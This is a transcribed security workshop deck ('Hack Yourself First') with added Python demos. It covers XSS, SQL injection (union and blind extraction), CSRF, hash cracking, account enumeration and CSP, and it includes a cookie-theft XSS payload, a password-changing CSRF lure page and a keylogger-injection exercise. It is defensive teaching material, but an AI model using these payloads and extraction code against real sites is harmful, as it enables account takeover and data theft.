Hack Yourself First. Troy Hunt, troyhunt.com (workshop slide transcription)
1 Hack Yourself First. Troy Hunt, @troyhunt, troyhunt.com
2 We're gonna turn you into lean, mean hacking machines!
3 Because if we don't, these kids are going to hack you: Jake Davies, 19 (and his mum); Ryan Cleary, 20 (and his mum); Curtis Gervais, 16, awaiting trial (probably with his mum)
4 Who are we protecting our assets from? [chart: hacker resources, from pocket money up to $10.8B per annum ("can invest where ROI makes sense"), plotted against hacker competency: bored kids, common thieves, super hackers]
5 Your Hacker Tools for Today: a Wi-Fi connection; a mobile device you can configure a proxy on (I have a few spares); Google Chrome, or another browser with good dev tools; Fiddler (getfiddler.com), or another HTTP proxy like charlesproxy.com
6 What we'll be covering on day 1: Introduction (30 mins, 09:00); Discovering risks via the browser (30 mins, 09:30); Using an HTTP proxy (30 mins, 10:00); Break (15 mins, 10:30); XSS (50 mins, 10:45); SQL injection part 1 (55 mins, 11:35); Lunch (1 hour, 12:30); Mobile APIs (60 mins, 13:30); CSRF (50 mins, 14:30); Break (15 mins, 15:20); Framework disclosure (30 mins, 15:35); Session hijacking (35 mins, 16:05); Wrap up (20 mins, 16:40); Close (17:00)
7 What we'll be covering on day 2: Password cracking (50 mins, 09:00); Account enumeration (40 mins, 10:00); Break (15 mins, 10:30); FiddlerScript (50 mins, 10:45); HTTPS (55 mins, 11:35); Lunch (1 hour, 12:30); Content Security Policy (60 mins, 13:30); SQL injection part 2 (50 mins, 14:30); Break (15 mins, 15:20); Brute force attacks (30 mins, 15:35); Automating attacks and review (35 mins, 16:05); Wrap up (20 mins, 16:40); Close (17:00)
8 Exercise 1 Discovering risks via the browser
9 Exercise 1 Chrome developer tools: familiarise yourself with the dev tools (Elements, network, cookies, console, por... uh, incognito). Create an account at hackyourselffirst.troyhunt.com. Hacker Challenge 1: Identify three security risks with the registration process
10 Exercise 2 Using an HTTP proxy
11 Exercise 2 Using an HTTP proxy: familiarise yourself with Fiddler. Watch requests and their headers, review the response body and headers, use the composer to reissue a request. Hacker Challenge 2: Use Fiddler to vote multiple times on 1 car with your ID
12 Exercise 3 Reflected cross site scripting (XSS)
13 Understanding XSS. A normal request, mysite.com/?q=ferrari, goes through the page code <p>you searched for <%= Request.QueryString["q"] %></p> and renders as <p>you searched for ferrari</p>. A crafted request, mysite.com/?q=<script>alert('yay XSS!');</script>, goes through the same template with no encoding and renders as <p>you searched for <script>alert('yay XSS!');</script></p>, so the injected script runs in the victim's browser with the page's origin.
14 Some quick XSS tips: check the encoding context (you encode for HTML differently than for JavaScript); check the encoding consistency (often it's manual and some characters are not encoded); play with JavaScript to manipulate the DOM, access cookies, load external resources
15 Exercise 3 XSS: establish the encoding practices on the search page (what's encoded, what's not, which contexts are being encoded for); what can be accessed or manipulated in the DOM. Hacker Challenge 3: Create an XSS attack that sends the auth cookie to another site
16 Exercise 3 solution (the payload closes the JavaScript string the value lands in, then redirects; the destination URL is cut off in the transcription): ');document.location='
17 Exercise 4 SQL injection (SQLi) part 1
18 Understanding SQLi. The page builds its query by concatenation: var query = "SELECT * FROM Widget WHERE Id = "; query += Request.Query["id"]. With mysite.com/?id=1 the database runs SELECT * FROM Widget WHERE Id = 1. With mysite.com/?id=foo it runs SELECT * FROM Widget WHERE Id = foo and fails with Invalid column name 'foo'; that error text reaching the browser is the first sign of an injectable parameter.
19 Some quick SQLi tips: think of SQL commands which disclose structure (sys.tables, sys.columns, system commands); consider how you'd enumerate through records (select the top x rows ascending, then the top 1 row from that set descending); write out how you think the query works internally, e.g. SELECT * FROM Supercar ORDER BY [URL param]
20 Exercise 4 SQLi: explore the database using error-based SQLi; construct strings to disclose internal data; cast things to invalid types to disclose via exceptions. Hacker Challenge 4: Discover the version of the DB
21 Exercise 4 solution
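The slides above show the two injectable shapes (a value concatenated into WHERE, and a column name concatenated into ORDER BY) and the idea that an echoed database error discloses structure. The example below is added here and is not the workshop's code; it is a Python/SQLite stand-in for the page, with a constructed Supercar table. SQLite has no convert(int, ...) trick, so the error-based disclosure shown is SQLite's own: an out-of-range ORDER BY term makes the engine report how many columns the query returns. The hardened versions show the two different fixes, because the two shapes need different ones: a bound parameter for the value, an allowlist for the identifier.

```python
import re
import sqlite3


# Constructed sample table (assumption; not the workshop site's real schema).
def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE Supercar (Id INTEGER PRIMARY KEY, Name TEXT, Country TEXT, TopSpeed INTEGER);
        INSERT INTO Supercar VALUES (1, 'Ferrari F12', 'Italy', 340), (2, 'McLaren P1', 'UK', 350),
                                    (3, 'Nissan GT-R', 'Japan', 315);
    """)
    return db


def get_supercar_vulnerable(db, id_param):
    """Slide 18 pattern: the URL parameter is concatenated into the WHERE clause.
    The page echoes the exception text, which is what error-based SQLi reads."""
    query = "SELECT * FROM Supercar WHERE Id = " + id_param
    try:
        return db.execute(query).fetchall()
    except sqlite3.Error as e:
        return "ERROR: " + str(e)


def list_supercars_vulnerable(db, order_param):
    """Slide 19 pattern: SELECT * FROM Supercar ORDER BY [URL param]."""
    query = "SELECT * FROM Supercar ORDER BY " + order_param
    try:
        return db.execute(query).fetchall()
    except sqlite3.Error as e:
        return "ERROR: " + str(e)


def column_count_via_error(db):
    """Structure disclosure through an error: ORDER BY 99 makes SQLite complain
    'should be between 1 and N', naming the column count of the hidden query.
    (On SQL Server the equivalent lever is convert(int, <value>).)"""
    result = list_supercars_vulnerable(db, "99")
    m = re.search(r"between 1 and (\d+)", str(result))
    return int(m.group(1)) if m else None


# Hardened versions: bind the value; allowlist the identifier.
ORDER_COLUMNS = {"name": "Name", "country": "Country", "topspeed": "TopSpeed"}


def get_supercar_safe(db, id_param):
    """The id is validated as an integer and passed as a bound parameter, never as SQL text."""
    try:
        id_value = int(id_param)
    except ValueError:
        return []
    return db.execute("SELECT * FROM Supercar WHERE Id = ?", (id_value,)).fetchall()


def list_supercars_safe(db, order_param):
    """ORDER BY cannot take a bound parameter, so map the request value onto a
    fixed set of column names and reject anything else."""
    column = ORDER_COLUMNS.get(order_param.lower())
    if column is None:
        raise ValueError("unsupported sort column")
    return db.execute("SELECT * FROM Supercar ORDER BY " + column).fetchall()
```

get_supercar_vulnerable(db, "foo") returns the same kind of message the slide shows ("no such column: foo"), and "1 OR 1=1" returns every row. Against the safe versions the same inputs are rejected before any SQL is assembled.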
22 Exercise 5 Mobile APIs
23 Understanding mobile APIs
24 Who are we protecting our APIs from? [diagram: the HTTP(S) path between the mobile app and its API, with attacker positions marked on it]
25 Trusting the Fiddler root cert [screenshot: installing the proxy's root certificate on the device so it can intercept HTTPS]
26 Some quick mobile API tips: look at the HTTP requests for sensitive data (credentials, account info, PII). Remove the proxy's root cert from the device and make the HTTPS requests again: if the app still works through the proxy, it is not validating the server certificate at all. In your own apps, look for parameter tampering, auth bypass and direct object references
27 Exercise 5 Mobile APIs: proxy your device through Fiddler or Charles; inspect the traffic of your apps; perform normal activities and monitor the requests. Hacker Challenge 5: Find three things of interest (doesn't have to be security related)
28 Exercise 6 Cross site request forgery (CSRF)
29 Understanding CSRF: the user logs in (POST /Login/Account; the response carries Set-Cookie: AuthCookie=XXX). From then on every request to an authenticated resource (GET /Path/To/Authenticated/Resource with Cookie: AuthCookie=XXX) carries the cookie automatically, including requests the attacker's page makes the browser send: CSRF here! Authenticated request!
30 Some quick CSRF tips: establish the request pattern to the target resource (what fields are being sent); reconstruct the request from your own resource (normally a malicious page); lure the user into the malicious resource (usually requires incentivisation)
31 Exercise 6 CSRF: mount your own CSRF attack; reproduce a legitimate request; use it to perform a malicious action. Hacker Challenge 6: Change the present user's password when they load your page
32 Exercise 6 solution
33 Exercise 6 solution (the lure page; the form's action URL is not captured in the transcription):
    <html>
    <head>
      <title>win an iphone!!!</title>
    </head>
    <body style="text-align: center;">
      <h1 style="font-size: 1.7em;">Want to win an iphone? Of course you do! Click the button below and it's yours!!!</h1>
      <!-- action: the target site's change-password URL (missing from the transcription) -->
      <form action="..." method="post" target="hiddenframe">
        <input type="hidden" name="newpassword" value="hackpword" />
        <input type="hidden" name="confirmpassword" value="hackpword" />
        <input type="submit" value="i wanna win!" onclick="alert('you won! Click ok and it\'s done')" style="font-size: 2em;" />
      </form>
      <p><img src="iphone.jpg" style="width: 900px;" /></p>
      <!-- the POST lands in this hidden frame, so the victim never sees the response -->
      <iframe name="hiddenframe" style="display: none;"></iframe>
    </body>
    </html>
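The lure page works because the server accepts the cookie as the only proof that the user meant to send the request. The example below is added here and is not the workshop's code; it is a Python stand-in for the change-password handler, with the request modelled as a dict (cookie, Origin header, form fields). The session store, secret and origin are constructed assumptions. The vulnerable handler accepts the forged POST; the hardened one demands a synchronizer token bound to the session, which the attacker's page on another origin cannot read, and rejects a foreign Origin header as a second layer.

```python
import hashlib
import hmac
import secrets

# Constructed server secret, session store and site origin (assumptions).
SERVER_SECRET = secrets.token_bytes(32)
SESSIONS = {"auth-cookie-value": {"user": "alice", "password": "old-password"}}
SITE_ORIGIN = "https://www.example.com"


def csrf_token_for(session_id):
    """Synchronizer token derived from the session id and a server secret. It is
    embedded in our own form, not in a cookie, so a cross-site POST cannot carry it."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def _apply_change(session, form):
    if form.get("newpassword") != form.get("confirmpassword"):
        return 400
    session["password"] = form["newpassword"]
    return 200


def change_password_vulnerable(request):
    """Authenticates on the cookie alone. The browser attaches the cookie to the
    POST from the hidden iframe form, so that is all the attacker needs."""
    session = SESSIONS.get(request["cookie"])
    if session is None:
        return 401
    return _apply_change(session, request["form"])


def change_password_safe(request):
    """Checks the per-session token in the body and, as a second layer, that the
    Origin header (when a browser sends one) is our own, before touching state."""
    session = SESSIONS.get(request["cookie"])
    if session is None:
        return 401
    origin = request.get("origin")
    if origin is not None and origin != SITE_ORIGIN:
        return 403
    expected = csrf_token_for(request["cookie"])
    if not hmac.compare_digest(request["form"].get("csrftoken", ""), expected):
        return 403
    return _apply_change(session, request["form"])


def forged_request():
    """What the 'win an iphone' page produces: the field names the attacker learned
    from the real form, plus the victim's cookie added by the browser."""
    return {"cookie": "auth-cookie-value", "origin": "https://attacker.example",
            "form": {"newpassword": "hackpword", "confirmpassword": "hackpword"}}


def legitimate_request():
    """The same POST as issued from our own page: same origin, token present."""
    req = forged_request()
    req["origin"] = SITE_ORIGIN
    req["form"]["csrftoken"] = csrf_token_for("auth-cookie-value")
    return req
```

The Origin check alone is not enough (some non-browser clients omit the header, which is why a missing header is tolerated here), and marking the auth cookie SameSite narrows the attack further; the token is the control that works everywhere.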
34 Exercise 7 Framework disclosure
35 Understanding framework disclosure risks: learn of a framework vulnerability; search the web for sites that disclose they run that framework version; pwn!
36 Some quick framework disclosure tips: there are multiple ways the framework is leaked, and this can differ by web stack. Different requests can cause different leakage, so consider the different ways in which a site may respond (errors, 404s, malformed requests). Also think about other ways disclosure happens: markup structure, naming patterns, etc
37 Exercise 7 Framework disclosure: discover the internal framework of the site; identify what's being implicitly leaked; cause the app to leak additional information. Hacker Challenge 7: Identify 3 different ways in which the internal framework is disclosed
38 Exercise 7 solution: 1. Response headers (Server, X-Powered-By, ASP.NET version, MVC version) 2. Unhandled exception stack trace (includes the minor ASP.NET version) 3. Session ID cookie name (ASP.NET_SessionId) 4. Error page for 404 (includes the minor ASP.NET version) 5. Database version via SQLi 6. ELMAH (the ASP.NET error log module, where its handler is reachable) 7. HTTP fingerprinting
39 HTTP field ordering (years and version numbers were lost in the transcription). Apache:
    HTTP/... OK
    Date: Sun, 15 Jun ... :10:49 GMT
    Server: Apache/...
    Last-Modified: Thu, 27 Feb 2003 ...
    ETag: "32417-c4-3e5d8a83"
    Accept-Ranges: bytes
    Content-Length: 196
    Connection: close
    Content-Type: text/html
IIS 5.0:
    HTTP/... OK
    Server: Microsoft-IIS/5.0
    Content-Location: ...
    Date: Fri, 01 Jan ... :13:52 GMT
    Content-Type: text/html
    Accept-Ranges: bytes
    Last-Modified: Fri, 01 Jan 1999 ...
    ETag: W/"e0d362a4c335be1:ae1"
    Content-Length: 133
Apache sends Date before Server; IIS sends Server first and orders Content-Type, Accept-Ranges and Last-Modified differently, so even a scrubbed Server header leaves a fingerprint.
40 Other fingerprinting indicators Forbidden resource Improper HTTP version Improper protocol
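The solution list and the field-ordering slide together describe a checklist; the example below turns it into a function. It is added here and is not the workshop's code: a Python parser for a raw HTTP response that reports disclosing headers, a recognised session cookie name, the version string an ASP.NET error page prints, and the Date/Server ordering heuristic. The two sample responses are constructed, not captures from any real site; the header values in them are assumptions.

```python
import re

DISCLOSING_HEADERS = {"server", "x-powered-by", "x-aspnet-version", "x-aspnetmvc-version"}
KNOWN_SESSION_COOKIES = {"ASP.NET_SessionId": "ASP.NET", "PHPSESSID": "PHP",
                         "JSESSIONID": "Java servlet container"}
# Footer an unhandled ASP.NET error page prints ("... ASP.NET Version:4.0.30319.34209").
ASPNET_ERROR_FOOTER = re.compile(r"ASP\.NET Version:([\d.]+)")


def parse_response(raw):
    """Split a raw HTTP response into (status line, ordered (name, value) headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    status, *lines = head.split("\r\n")
    headers = []
    for line in lines:
        name, _, value = line.partition(":")
        headers.append((name.strip(), value.strip()))
    return status, headers, body


def fingerprint(raw):
    """Collect framework disclosures the way the exercise solution lists them:
    headers, session cookie name, error-page version string, header ordering."""
    _, headers, body = parse_response(raw)
    findings = []
    names = [name.lower() for name, _ in headers]
    for name, value in headers:
        if name.lower() in DISCLOSING_HEADERS:
            findings.append(f"header {name}: {value}")
        elif name.lower() == "set-cookie":
            cookie = value.split("=", 1)[0]
            if cookie in KNOWN_SESSION_COOKIES:
                findings.append(f"session cookie {cookie}: {KNOWN_SESSION_COOKIES[cookie]}")
    m = ASPNET_ERROR_FOOTER.search(body)
    if m:
        findings.append(f"error page: ASP.NET {m.group(1)}")
    # Slide 39 heuristic: Apache emits Date before Server, IIS emits Server first.
    # Worth checking even when Server is present, in case its value was faked.
    if "date" in names and "server" in names:
        order = "Apache-like" if names.index("date") < names.index("server") else "IIS-like"
        findings.append(f"header order: {order}")
    return findings


# Constructed sample responses (assumptions; not captures from a real site).
SAMPLE_IIS = (
    "HTTP/1.1 500 Internal Server Error\r\n"
    "Server: Microsoft-IIS/8.0\r\n"
    "X-AspNet-Version: 4.0.30319\r\n"
    "X-AspNetMvc-Version: 5.1\r\n"
    "X-Powered-By: ASP.NET\r\n"
    "Set-Cookie: ASP.NET_SessionId=abc123; path=/; HttpOnly\r\n"
    "Date: Sun, 15 Jun 2014 09:10:49 GMT\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
    "<html><body><h1>Server Error</h1><hr>Version Information: "
    "Microsoft .NET Framework Version:4.0.30319; ASP.NET Version:4.0.30319.34209</body></html>"
)
SAMPLE_APACHE = (
    "HTTP/1.1 200 OK\r\n"
    "Date: Thu, 27 Feb 2003 10:00:00 GMT\r\n"
    "Server: Apache/2.2.22\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
    "<html><body>hello</body></html>"
)
```

fingerprint(SAMPLE_IIS) yields seven findings, one per leak the solution slide enumerates under headers, cookies and error pages; the Apache sample yields only the Server header and the ordering. Feed it the raw text you copy out of Fiddler's response inspector.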
41 Exercise 8 Session hijacking
42 Understanding session hijacking: the user logs in (POST /Login/Account; the response carries Set-Cookie: AuthCookie=XXX); the attacker steals the cookie; the attacker issues an authenticated request with the cookie
43 Some quick session hijacking tips: persistence over HTTP can be done multiple ways (cookie, URL); the session or auth ID can be obtained multiple ways (insecure transport, referrer, stored in exceptions, XSS); factors that limit hijacking: short-duration expiry, keyed to client device / IP
44 Exercise 8 Session hijacking: mount a session hijacking attack; identify how auth is being persisted; obtain the auth token using a vuln in the app. Hacker Challenge 8: Use an XSS risk to obtain the auth token and recreate the session in another browser
45 For tomorrow, homework! Download hashcat (hashcat.net/hashcat); download the hashkiller dic (tinyurl.com/hashkiller); download the Stratfor hashes (tinyurl.com/stratforhashes); download Python 2.7 for Windows (python.org/downloads); download sqlmap (sqlmap.org)
46 What we'll be covering on day 2: Password cracking (50 mins, 09:00); Account enumeration (40 mins, 10:00); Break (15 mins, 10:30); FiddlerScript (50 mins, 10:45); HTTPS (55 mins, 11:35); Lunch (1 hour, 12:30); Content Security Policy (60 mins, 13:30); SQL injection part 2 (50 mins, 14:30); Break (15 mins, 15:20); Brute force attacks (30 mins, 15:35); Automating attacks and review (35 mins, 16:05); Wrap up (20 mins, 16:40); Close (17:00)
47 Exercise 9 Password cracking
48 Understanding password hashing: passw0rd -> hashing algorithm -> hash (the slide calls the output a "cipher", but a hash is not reversible encryption). Store the hash and repeat the process at login
49 Understanding password hashing with salt: passw0rd + random salt -> hashing algorithm -> hash. Store the hash and the salt; retrieve the hash and salt for the username and repeat the process at login
50 Understanding hash cracking: this is not about breaking the algorithm (you can't unhash); it's about repeating the hash-creation process over candidate passwords until one matches. It's just a question of speed
51 Some quick hash cracking tips: there are multiple ways to crack: character space ([a-zA-Z0-9]), dictionary (passw0rd, abc123, qwerty), mutations (manipulation and substitution of characters). Cracking is all about the time factor; it's not absolute: how long does it take to crack how many?
52 Exercise 9 Password cracking: cracking the Stratfor password hashes; identify the hashing algorithm; convert them to plain text. Hacker Challenge 9: Use hashcat with the hashkiller dic to crack the Stratfor hashes. Hint: hashcat-cli64.exe --help
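Slides 48 to 51 describe hashing, salting, and cracking as "repeating the process, fast". The example below is added here and is not the workshop's code or hashcat: a small Python cracker that applies a dictionary plus a few mutation rules against unsalted MD5, then the same dictionary against per-user salted hashes, so the cost difference the salt slide implies is visible in the attempt count. The wordlist, leet map and target hashes are constructed, not the hashkiller dictionary or the Stratfor dump; the hash choice (MD5) is an assumption standing in for whatever the exercise identifies. The last function is what the defender should be using instead.

```python
import hashlib

# Constructed wordlist and leet map (assumptions; the workshop uses the hashkiller dic).
WORDLIST = ["password", "letmein", "qwerty", "monkey", "dragon"]
LEET = {"a": "@", "e": "3", "i": "1", "o": "0", "s": "$"}


def mutations(word):
    """A tiny rule set in the spirit of hashcat rules: case changes, common
    suffixes, leet substitution (lower-case letters only)."""
    base = {word, word.capitalize(), word.upper()}
    out = set()
    for w in base:
        for suffix in ("", "1", "123", "!"):
            out.add(w + suffix)
        leet = "".join(LEET.get(c, c) for c in w)
        out.add(leet)
        out.add(leet + "1")
    return out


def md5_hex(text):
    return hashlib.md5(text.encode()).hexdigest()


def crack_unsalted(target_hashes, wordlist):
    """Unsalted fast hash: hash each candidate once and look it up against every
    target. Cost grows with the candidate count, not with the number of victims.
    Returns ({hash: plaintext}, candidates hashed)."""
    table = {}
    for word in wordlist:
        for cand in mutations(word):
            table[md5_hex(cand)] = cand
    return {h: table[h] for h in target_hashes if h in table}, len(table)


def crack_salted(targets, wordlist):
    """Per-user salt ({user: (salt_bytes, hex digest)}): every candidate has to be
    re-hashed for every user, so the work is candidates x users and a precomputed
    table is useless. Returns ({user: plaintext}, hashes computed)."""
    found, attempts = {}, 0
    for user, (salt, digest) in targets.items():
        for word in wordlist:
            for cand in mutations(word):
                attempts += 1
                if hashlib.md5(salt + cand.encode()).hexdigest() == digest:
                    found[user] = cand
                    break
            if user in found:
                break
    return found, attempts


def slow_hash(password, salt, iterations=200_000):
    """What to store instead of MD5: an iterated, salted KDF makes every guess
    cost `iterations` hash operations for the attacker as well as for the login."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations).hex()
```

With the constructed wordlist, md5_hex("p@$$w0rd1") and md5_hex("Dragon123") fall out of the unsalted lookup immediately, while an unrelated passphrase does not; the salted run recovers "Monkey!" only by re-hashing for that user. The time factor the tips talk about is the size of that candidate set multiplied by the hash cost, which is exactly what slow_hash inflates.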
53 Exercise 10 Account enumeration
54 Understanding account enumeration: ask the site the same question for several addresses (the addresses on the slide are not captured in the transcription): does this one have an account? No. This one? No. This one? Yes
55 Some quick account enumeration tips: there are usually multiple vectors for identifying the existence of an account; there may or may not be an anti-automation defence, and it may be inconsistent across vectors; it may or may not even matter; very dependent on the nature
56 Exercise 10 Account enumeration Identify vectors for account enumeration Think about how to ask the site about an account Identify positive versus negative responses Hacker Challenge 10: Identify 3 sites you use that disclose the presence of your account
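The exercise asks you to find vectors and tell positive from negative responses. The example below is added here and is not the workshop's code: a Python model of three vectors (login, registration, password reset) in their usual leaky form, the constant-response versions of the two that can be fixed outright, and a probe that groups candidate addresses by the response they produce. A vector that splits the candidates into two classes is an enumeration oracle. The user table is constructed.

```python
# Constructed user store (assumption).
USERS = {"alice@example.com": "s3cret"}


def login_vulnerable(email, password):
    """Two different failure messages: the first one alone answers 'does this account exist?'."""
    if email not in USERS:
        return "Unknown email address"
    if USERS[email] != password:
        return "Incorrect password"
    return "OK"


def register_vulnerable(email):
    return "Email already registered" if email in USERS else "Welcome"


def reset_vulnerable(email):
    return "Reset link sent" if email in USERS else "No account for that email"


def login_safe(email, password):
    """One message for both failure cases (and the same work done in both, so
    timing does not become the next oracle)."""
    return "OK" if USERS.get(email) == password else "Invalid email or password"


def reset_safe(email):
    """Same response whether or not the address exists; the email, if any, goes out of band."""
    return "If that address is registered, a reset link has been sent"


def enumerate_accounts(probe, candidates):
    """Call `probe` for each candidate and group candidates by response text.
    More than one class means the vector discloses which accounts exist."""
    classes = {}
    for candidate in candidates:
        classes.setdefault(probe(candidate), []).append(candidate)
    return classes
```

Registration is the awkward one: a site cannot both accept a sign-up and hide that the address is taken in the same response, which is why the tips say a defence may be inconsistent across vectors and "may or may not even matter". The usual answer is to move the disclosure out of band (email the existing owner) and rate-limit the endpoint, rather than pretend it is closed.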
57 Exercise 11 FiddlerScript
58 Understanding FiddlerScript Highlight particular request / response patterns Modify requests or responses in transit Good representation of what can be done with intercepted traffic Also great for causing apps to misbehave!
59 Some quick FiddlerScript tips: make good use of the FiddlerScript CookBook (Google it; first result). Wrap conditions around response parsing for better perf: host name / path / content type / method. Don't forget to hit the Save Script button! Plus debugging can be painful
60 Exercise 11 FiddlerScript: identify the request / response patterns of an app; manipulate the request / response to cause misbehaviour. Hacker Challenge 11: Proxy your mobile device and cause one of your apps to do something interesting
61 Exercise 12 HTTPS
62 Understanding HTTPS Confidentiality Integrity Authenticity
63 Some quick HTTPS tips: consider everything sent over HTTP to be compromised (sometimes that won't matter much). Also look at HTTPS content embedded in or reached from untrusted pages: an HTTPS form inside an HTTP iframe, or an HTTPS link on an HTTP page, can be rewritten by whoever controls the HTTP response before the secure request is ever made
64 Exercise 12 HTTPS: you can't trust insecure login forms! The form can be manipulated in transit; manipulate it to capture the secure credentials in transit. Hacker Challenge 12: Inject a JavaScript keylogger into an insecure login page using FiddlerScript
65 Injecting the keylogger: hackyourselffirst.troyhunt.com/scripts/keylogger.js; set the destination JavaScript variable (where the captured keystrokes are sent)
66 Exercise 13 Content Security Policy (CSP)
67 Without a CSP: anything can be added to the page via a reflected XSS risk; anything can be added to the DOM downstream of the server, and you have no idea when this one is happening!
68 With a CSP: the browser will only load resources you white-list (local resources, remote resources); any violations can be reported. If you're nervous, you can always just report and not block (the Content-Security-Policy-Report-Only header)
69 Some quick CSP tips: create a white list of what should be allowed to run; start with nothing and see what breaks (in development!); use the report feature to track exceptions: you'll learn some interesting things
70 Exercise 13 CSP: American Express needs help! They have no CSP and they're a financial institution! We can add one ourselves in transit. Hacker Challenge 13: Write a CSP for American Express and embed it using FiddlerScript
71 Injecting the CSP header (FiddlerScript, in OnBeforeResponse; the hostname and the policy string are not captured in the transcription):
    if (oSession.HostnameIs("...")) {
        oSession.oResponse.headers["Content-Security-Policy"] = "...";
    }
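Writing a policy is easier once you can predict what the browser will do with it. The example below is added here and is not the workshop's code or a browser's implementation: a small Python evaluator for a subset of CSP source matching ('none', 'self', '*', scheme sources like data:, host sources with an optional scheme and a leading wildcard, and the default-src fallback). Nonces, hashes and path matching are deliberately left out. The policy string and URLs in the usage are constructed; the point is to see that a reflected inline <script> is refused by a policy without 'unsafe-inline', and that a script injected over plain HTTP fails 'self' on an HTTPS page.

```python
from urllib.parse import urlsplit


def parse_policy(header):
    """\"default-src 'none'; script-src 'self' https://cdn.example.com\" -> {directive: [sources]}."""
    policy = {}
    for directive in header.split(";"):
        parts = directive.split()
        if parts:
            policy[parts[0].lower()] = parts[1:]
    return policy


def _origin(url):
    u = urlsplit(url)
    return f"{u.scheme}://{u.netloc}"


def _source_matches(source, url, page_origin):
    """Subset of CSP source-expression matching; see the lead-in for what is omitted."""
    if source == "'none'":
        return False
    if source == "'self'":
        return _origin(url) == page_origin
    if source == "*":
        return True
    if source.startswith("'"):
        return False               # 'unsafe-inline', nonces, hashes: never match a URL
    u = urlsplit(url)
    if source.endswith(":"):       # scheme source, e.g. data:
        return u.scheme == source[:-1]
    s = urlsplit(source if "://" in source else "https://" + source)
    scheme_ok = "://" not in source or s.scheme == u.scheme
    host = s.hostname or ""
    if host.startswith("*."):
        host_ok = u.hostname is not None and u.hostname.endswith(host[1:])
    else:
        host_ok = u.hostname == host
    return scheme_ok and host_ok


def allows(policy, directive, url=None, page_origin="https://www.example.com"):
    """True if `policy` lets a page at page_origin load `url` under `directive`.
    With url=None, answers whether inline script/style is permitted. A missing
    directive falls back to default-src; no default-src means CSP's default of allow-all."""
    sources = policy.get(directive, policy.get("default-src", ["*"]))
    if url is None:
        return "'unsafe-inline'" in sources
    return any(_source_matches(s, url, page_origin) for s in sources)
```

The "start with nothing and see what breaks" advice maps onto default-src 'none' here: anything not named by a more specific directive is refused, so the report-only header shows you the full list of what the site really loads before you enforce it.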
72 Exercise 14 SQL injection (SQLi) part 2
73 Understanding (more) SQLi: error based; union based; blind (boolean); blind (time)
74 Understanding union based injection: error based worked due to improper handling of internal exceptions. It was also laborious: one request per piece of internal data exposed. Union based injection appends the result of an injected query to a legitimate query, so whole rows from another table come back in the page's normal output (the injected SELECT has to match the original's column count and compatible types)
76 Understanding blind injection: you can't always rely on data being explicitly returned to the UI. Sometimes we need to ask questions of the system and draw conclusions from the answers
77 Understanding boolean blind injection: these are effectively yes / no questions; the answer causes the system to return results in a different way
78 Lowercase letter ASCII table: a=97, b=98, c=99, d=100, e=101, f=102, g=103, h=104, i=105, j=106, k=107, l=108, m=109, n=110, o=111, p=112, q=113, r=114, s=115, t=116, u=117, v=118, w=119, x=120, y=121, z=122
79 Discovering letters via ASCII ranges [decision tree; the slide's nodes, as transcribed, are "<= m", "<= s", "<= t", "<= v" and "= u", each with yes/no branches, ending at u or v]. Each node is one injected comparison against the character's code, and each answer halves the remaining range, so a letter costs a handful of questions rather than one per possible character
81 Understanding time based blind injection: it's still a yes / no question, but there's no output to determine the answer by. In order to create an observable answer, we'll ask the database to delay the response: yes: respond immediately; no: wait for 2 seconds then respond
82 A condition with a time based result (T-SQL): IF 'b' > 'a' WAITFOR DELAY '00:00:05'
83 Exercise 14 SQLi: establish which vectors exist for which SQLi styles; there may be only one vulnerable point in the app, and it usually takes patience to discover! Hacker Challenge 14: Use union based injection to return all email addresses and passwords
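Slides 74 through 82 describe three ways of getting data out of the same injectable parameter: appending rows with UNION, asking yes/no questions and halving the ASCII range, and asking the same questions with a delay as the answer. The example below is added here and is not the workshop's code; it is a Python/SQLite stand-in for the vulnerable page that serves all three, with constructed Supercar and UserProfile tables. SQLite has no WAITFOR DELAY, so a Python sleep() is registered as a SQL function to play that role (an assumption, not SQLite behaviour). The page swallows errors and only ever shows rows, which is what forces the blind techniques. The binary search is the general algorithm of which slide 79 shows one instance.

```python
import sqlite3
import time


# Constructed tables and data (assumptions; not the workshop site's schema).
def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE Supercar (Id INTEGER PRIMARY KEY, Name TEXT, Country TEXT);
        INSERT INTO Supercar VALUES (1, 'Ferrari F12', 'Italy'), (2, 'McLaren P1', 'UK');
        CREATE TABLE UserProfile (Id INTEGER PRIMARY KEY, Email TEXT, Password TEXT);
        INSERT INTO UserProfile VALUES (1, 'alice@example.com', 'hunter2'), (2, 'bob@example.com', 'letmein');
    """)
    # Stand-in for WAITFOR DELAY: sleep(seconds) returns 0 after sleeping.
    db.create_function("sleep", 1, lambda s: time.sleep(s) or 0)
    return db


def page_vulnerable(db, supercar_id):
    """The one injectable point: the id is concatenated into the query. The page
    renders whatever rows come back and shows nothing on error."""
    try:
        return db.execute("SELECT Name, Country FROM Supercar WHERE Id = " + supercar_id).fetchall()
    except sqlite3.Error:
        return []


def union_dump(db):
    """Slide 74: two columns in, two columns out, so UserProfile rows ride along."""
    return page_vulnerable(db, "1 UNION SELECT Email, Password FROM UserProfile")


def boolean_oracle(db):
    """Slide 77: the Ferrari row is present iff the injected condition is true."""
    return lambda cond: page_vulnerable(db, f"1 AND ({cond})") != []


def time_oracle(db, delay=0.05):
    """Slide 81: the rows are the same either way; only the response time answers."""
    def ask(cond):
        start = time.monotonic()
        page_vulnerable(db, f"1 AND (CASE WHEN ({cond}) THEN sleep({delay}) ELSE 0 END) = 0")
        return time.monotonic() - start >= delay * 0.6
    return ask


def bsearch(is_le, lo, hi):
    """Smallest v in [lo, hi] for which is_le(v) is true, given is_le is monotone.
    This is the 'discovering letters via ASCII ranges' tree, generalised."""
    while lo < hi:
        mid = (lo + hi) // 2
        if is_le(mid):
            hi = mid
        else:
            lo = mid + 1
    return lo


def extract_string(oracle, expr, max_len=64):
    """Recover the value of SQL expression `expr` using only yes/no answers:
    first its length, then each character by code point (printable ASCII)."""
    length = bsearch(lambda n: oracle(f"length({expr}) <= {n}"), 0, max_len)
    out = ""
    for i in range(1, length + 1):
        code = bsearch(lambda n: oracle(f"unicode(substr({expr}, {i}, 1)) <= {n}"), 32, 126)
        out += chr(code)
    return out
```

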